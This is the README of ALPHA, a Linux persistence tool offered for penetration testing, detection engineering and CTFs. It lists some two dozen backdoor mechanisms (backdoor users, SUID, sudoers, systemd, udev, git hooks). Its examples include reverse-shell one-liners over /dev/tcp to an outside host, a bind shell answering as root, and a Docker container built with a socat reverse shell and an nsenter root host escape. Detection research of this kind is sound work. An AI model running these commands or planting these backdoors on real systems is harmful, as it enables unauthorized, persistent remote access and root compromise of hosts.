ALPHA is a Linux persistence tool for security research, detection engineering, penetration testing, and CTFs. It prioritizes functionality over stealth and is easily detectable on targets with a strong security posture. ALPHA is supported on popular distributions like Debian, Ubuntu, and RHEL, and is highly customizable to fit various OS environments.
ALPHA provides a versatile suite of features for simulating and researching Linux persistence mechanisms, which are displayed in the table below:
| Feature | Description | Root | User |
|---|---|---|---|
| At Job Persistence | At job persistence | ✓ | ✓ |
| Authorized Keys Management | Add public key to authorized keys | ✓ | ✓ |
| Backdoor User | Create backdoor user | ✓ | ✗ |
| Bind Shell | Execute backgrounded bind shell | ✓ | ✓ |
| Capabilities Backdoor | Add capabilities persistence | ✓ | ✗ |
| Cron Job Persistence | Cron job persistence | ✓ | ✓ |
| Create User | Create a new user | ✓ | ✗ |
| Git Persistence | Git persistence | ✓ | ✓ |
| Generator Persistence | Generator persistence | ✓ | ✗ |
| Init.d Backdoor | SysV Init (init.d) persistence | ✓ | ✗ |
| Malicious Docker Container | Docker container with host escape | ✓ | ✓ |
| MOTD Backdoor | Message Of The Day (MOTD) persistence | ✓ | ✗ |
| Package Manager Persistence | Package Manager persistence (APT/YUM/DNF) | ✓ | ✗ |
| Password Management | Add user to /etc/passwd directly | ✓ | ✗ |
| Password Change | Change user password | ✓ | ✗ |
| Rc.local Backdoor | Run Control (rc.local) persistence | ✓ | ✗ |
| Shell Profile Persistence | Shell profile persistence | ✓ | ✓ |
| SSH Key Persistence | SSH key persistence | ✓ | ✓ |
| Sudoers Backdoor | Sudoers persistence | ✓ | ✗ |
| SUID Backdoor | SUID persistence | ✓ | ✗ |
| System Binary Backdoor | System binary persistence | ✓ | ✗ |
| Systemd Service Persistence | Systemd service persistence | ✓ | ✓ |
| Udev Persistence | Udev (driver) persistence | ✓ | ✗ |
| XDG Autostart Persistence | XDG autostart persistence | ✓ | ✓ |
ALPHA offers comprehensive support/compatibility for each of the features across various Linux distributions and environments.
| Distribution | Support | Tested |
|---|---|---|
| Debian | ✓ | Tested on Debian 11 & 12 |
| Ubuntu | ✓ | Tested on Ubuntu 22.04 |
| RHEL | ✓ | Tested on RHEL 9 (MOTD unavailable) |
| CentOS | ✓ | Tested on CentOS Stream 9, 7 (MOTD unavailable) |
| Fedora | ✓ | ✗ |
| Arch Linux | ✓ | ✗ |
| OpenSUSE | ✓ | ✗ |
Some custom Linux distributions may have different paths, causing mechanisms to fail on untested versions. While most persistence mechanisms are supported, older versions may lack specific services. If a default command fails, the --custom flag in most features allows you to customize paths/commands to suit your environment. If that doesn't work, you can examine the script to understand and adapt it to your distribution.
Contributions through PRs or issues for new features or ideas are welcome!
Getting this up-and-running is as simple as downloading the script and execute it.
curl ... | bash
Executing the script will either show the root or user help menu, dependent on the privileges the current user has.
alpha@alpha-demo:~$ sudo ./alpha.sh
▄▄▄ ██▓ ██▓███ ██░ ██ ▄▄▄
▒████▄ ▓██▒ ▓██░ ██▒▓██░ ██▒▒████▄
▒██ ▀█▄ ▒██░ ▓██░ ██▓▒▒██▀▀██░▒██ ▀█▄
░██▄▄▄▄██ ▒██░ ▒██▄█▓▒ ▒░▓█ ░██ ░██▄▄▄▄██
▓█ ▓██▒░██████▒▒██▒ ░ ░░▓█▒░██▓ ▓█ ▓██▒
▒▒ ▓▒█░░ ▒░▓ ░▒▓▒░ ░ ░ ▒ ░░▒░▒ ▒▒ ▓▒█░
▒ ▒▒ ░░ ░ ▒ ░░▒ ░ ▒ ░▒░ ░ ▒ ▒▒ ░
░ ▒ ░ ░ ░░ ░ ░░ ░ ░ ▒
░ ░ ░ ░ ░ ░ ░ ░ ░
Aegrah's Linux Persistence Honed Assistant (ALPHA)
Github: https://github.com/Aegrah/ALPHA
Twitter: https://twitter.com/RFGroenewoud
Root User Options:
--at At job persistence
--authorized-keys Add public key to authorized keys
--backdoor-user Create backdoor user
--bind-shell Execute backgrounded bind shell
--cap Add capabilities persistence
--create-user Create a new user
--cron Cron job persistence
--docker-container Docker container with host escape
--generator Generator persistence
--git Git hook/pager persistence
--initd SysV Init (init.d) persistence
--malicious-package Build and Install a package for persistence (DNF/RPM)
--motd Message Of The Day (MOTD) persistence (not available on RHEL derivatives)
--package-manager Package Manager persistence (APT/YUM/DNF)
--passwd-user Add user to /etc/passwd directly
--password-change Change user password
--rc-local Run Control (rc.local) persistence
--shell-profile Shell profile persistence
--ssh-key SSH key persistence
--sudoers Sudoers persistence
--suid SUID persistence
--system-binary System binary persistence
--systemd Systemd service persistence
--udev Udev (driver) persistence
--xdg XDG autostart persistence
--revert Revert most changes made by ALPHA's default options
--quiet (-q) Quiet mode (no banner)
The script should be largely self-explanatory, however, this section will show a few examples of how to work with ALPHA.
Every persistence mechanism has a separate help menu:
root@ubuntu2204:/home/ruben# ./alpha.sh --udev --help
Usage: ./alpha.sh --udev [OPTIONS]
--examples Display command examples
--default Use default udev settings
--ip <ip> Specify IP address
--port <port> Specify port number
--at | --cron | --systemd Specify the mechanism to use
--custom Use custom udev settings
--command <command> Specify custom command
--path <path> Specify custom path
Every persistence mechanism also has an --examples flag that shows default and custom examples, helping in crafting the command that works for you.
root@ubuntu2204:/home/ruben# ./alpha.sh --git --examples
Examples:
--default:
./alpha.sh --git --default --ip 10.10.10.10 --port 1337 --hook|--pager
--custom:
./alpha.sh --git --custom --command "(nohup setsid /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/1337 0>&1' > /dev/null 2>&1 &) &" --path "gitdir/.git/hooks/pre-commit" --hook
./alpha.sh --git --custom --command "nohup setsid /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/1337 0>&1' > /dev/null 2>&1 & ${PAGER:-less}" --path "~/.gitconfig --pager"
Most of the persistence mechanisms are very simple, and will (hopefully) not require much explanation. For example, Systemd persistence can be set up simply through:
root@ubuntu2204:/home/ruben# ./alpha.sh --systemd --default --ip 10.10.10.10 --port 1337
Service file created successfully!
Timer file created successfully!
Created symlink /etc/systemd/system/timers.target.wants/dbus-org.freedesktop.resolved.timer → /usr/local/lib/systemd/system/dbus-org.freedesktop.resolved.timer.
[+] Systemd service persistence established!
When setting up a specific persistence mechanism, the script will let you know whether it worked, and in cases where information is needed to work with the persistence mechanism, additional information is provided. For example the bind shell mechanism:
root@ubuntu2204:/home/ruben# ./alpha.sh --bind-shell --default --architecture x64
[+] Bind shell binary /tmp/bd64 created and executed in the background.
[+] The bind shell is listening on port 9001.
[+] To interact with it from a different system, use: nc -nv <IP> 9001
[+] Bind shell persistence established!
Allowing you to interact with the bind shell:
❯ nc -nv 192.168.211.130 9001
(UNKNOWN) [192.168.211.130] 9001 (?) open
whoami
root
The same goes for mechanisms that have additional built-in features such as the Docker persistence mechanism, with a built-in root host escape:
ruben@ubuntu2204:~$ sudo ./alpha.sh --docker-container --ip 192.168.211.131 --port 330
[+] Building 10.4s (9/9) FINISHED docker:default
=> [internal] load build definition from Dockerfile 0.0s
=> => transferring dockerfile: 722B 0.0s
=> [internal] load metadata for docker.io/library/alpine:latest 2.1s
=> [internal] load .dockerignore 0.0s
=> => transferring context: 2B 0.0s
=> [1/5] FROM docker.io/library/alpine:latest@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0 0.8s
=> => resolve docker.io/library/alpine:latest@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0 0.0s
=> => sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0 1.85kB / 1.85kB 0.0s
=> => sha256:dabf91b69c191a1a0a1628fd6bdd029c0c4018041c7f052870bb13c5a222ae76 528B / 528B 0.0s
=> => sha256:a606584aa9aa875552092ec9e1d62cb98d486f51f389609914039aabd9414687 1.47kB / 1.47kB 0.0s
=> => sha256:ec99f8b99825a742d50fb3ce173d291378a46ab54b8ef7dd75e5654e2a296e99 3.62MB / 3.62MB 0.4s
=> => extracting sha256:ec99f8b99825a742d50fb3ce173d291378a46ab54b8ef7dd75e5654e2a296e99 0.2s
=> [2/5] RUN apk add --no-cache bash socat sudo util-linux procps 4.4s
=> [3/5] RUN adduser -D lowprivuser 0.6s
=> [4/5] RUN echo '#!/bin/bash' > /usr/local/bin/entrypoint.sh && echo 'while true; do /bin/bash -c "socat exec:\"/bin/bash\",pty,stderr,setsid,sigint,sane tcp:192.168.211.131:330" 0.8s
=> [5/5] RUN echo '#!/bin/bash' > /usr/local/bin/escape.sh && echo 'sudo nsenter -t 1 -m -u -i -n -p -- su -' >> /usr/local/bin/escape.sh && chmod +x /usr/local/bin/escape.sh && ec 0.8s
=> exporting to image 0.6s
=> => exporting layers 0.6s
=> => writing image sha256:b36eb0d13ee1a0c57c3e6a1ee0255ef474986f44d65b177c539b2ffb1d248790 0.0s
=> => naming to docker.io/library/malicious-container 0.0s
86ce6b00e872bb8c21d0dae21e747e830bb70b44ab7946558e563bf7f4b626ef
[+] Persistence through malicious Docker container complete.
[+] To escape the container with root privileges, run '/usr/local/bin/escape.sh'.
Which shows you exactly how to escape the container, and get access to the host.
❯ nc -nvlp 330
listening on [any] 330 ...
connect to [192.168.211.131] from (UNKNOWN) [192.168.211.130] 43400
86ce6b00e872:/$ /usr/local/bin/escape.sh
/usr/local/bin/escape.sh
root@ubuntu2204:~#
Publications in which ALPHA is leveraged:
- Linux Detection Engineering - The Basics of Linux Persistence (will be published soon...)
- Linux Detection Engineering - Beyond the Basics of Linux Persistence (will be published soon...)
Feel free to check out my socials for updates on (Linux) security research.
By sharing ALPHA, you can assist others in testing and improving their security posture and support the development of new detection capabilities in Linux security.
ALPHA is intended for authorized security testing and research purposes only. Misuse of this tool for malicious activities is not condoned and is entirely at the user's own risk. By using ALPHA, you agree that you are responsible for your own actions.